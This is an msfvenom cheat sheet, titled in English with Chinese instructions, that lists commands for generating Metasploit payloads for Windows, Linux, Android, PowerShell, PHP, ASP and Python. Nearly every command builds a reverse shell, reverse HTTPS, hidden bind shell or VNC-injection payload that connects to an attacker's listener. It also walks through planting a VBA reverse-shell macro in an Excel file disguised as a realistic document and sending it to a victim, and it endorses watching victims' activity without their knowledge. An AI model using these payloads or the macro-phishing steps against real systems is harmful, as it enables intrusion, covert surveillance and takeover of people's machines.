MSFVenom Cheat Sheet – Easy way to create Metasploit Payloads

  1. msf > use exploit/multi/handler
  1. msfvenom --list formats # 列出所有支持的格式
  2. msfvenom -l payloads # 列出所有的 payload

Payload

反向 TCP 负载

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > /root/Desktop/reverse_tcp.exe

HTTPS 负载

  1. msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

隐藏绑定负载

此有效负载在执行时静默隐藏在后台,如果被任何端口扫描器扫描则不会显示其存在。

  1. msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

反向 SHELL 负载

  1. msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe

Macro Payload

现在让我们使用 VBA 脚本创建一个 payload,我们将使用它在 Excel 上创建一个宏来利用受害者机器。

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

执行命令后,从“#if VBA 7”开始复制脚本,直到“End if”,如下图突出显示:

Msfvenom - 图1

现在让我们打开一个excel文件,然后按alt+F11键打开VB脚本,你会得到一个选项框,输入你要提供的名字,然后点击“创建”。

Msfvenom - 图2Msfvenom - 图3

您将获得一个新的选项框,如上所示,单击“此工作簿”并将值替换为您复制的由 msfvenom 工具生成的 vb 脚本有效负载,然后关闭 vb 脚本编辑器并启用宏。

Msfvenom - 图4

现在你可以用相关数据起草你的 excel 文件,这对于受害者打开文件来说可能看起来很现实,在我们的例子中,我们刚刚插入值“Test”保存文件并将其发送给受害者。

Msfvenom - 图5

一旦受害者打开 excel 文件,它会提示受害者启用 Macro ,一旦启用,我们的 VBScript 将被执行,为我们提供到受害者机器的反向连接,如下图所示。

VNC 负载

如果我们可以在受害者不知情的情况下获取受害者机器的远程控制并匿名观察他们的活动,这不是很好吗

  1. msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

Msfvenom - 图6

生成有效载荷并发送给受害者执行后,我们可以看到反向连接已经执行了 VNC 注入,受害者远程机器会话在我们显示远程桌面的 kali 机器上建立。

Msfvenom - 图7

安卓负载

  1. msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

Linux

  1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

Powershell

  1. msfvenom -p cmd/windows/reverse_powershell lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

编程语言

PHP

  1. msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python

  1. msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py